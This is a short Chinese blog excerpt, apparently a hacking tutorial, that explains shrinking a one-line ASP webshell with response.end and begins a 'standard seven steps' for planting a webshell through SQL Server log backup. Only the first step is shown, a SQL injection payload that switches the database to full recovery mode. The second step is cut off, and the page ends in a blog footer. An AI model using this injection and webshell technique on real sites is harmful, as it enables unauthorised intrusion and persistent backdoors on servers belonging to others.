加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.
日志备分WEBSHELL标准的七步:
1.InjectionURL’;alter database XXX set RECOVERY FULL-- (把sql设置成日志完全恢复模式)
2.InjectionURL’;
[阅读全文]
Powered By F2blog v1.2 build 03.01 CopyRight 2006 - 2008 天晴无名氏
赣ICP备07001701号 Processed in 0.071428 second(s), 2 queries, Gzip enabled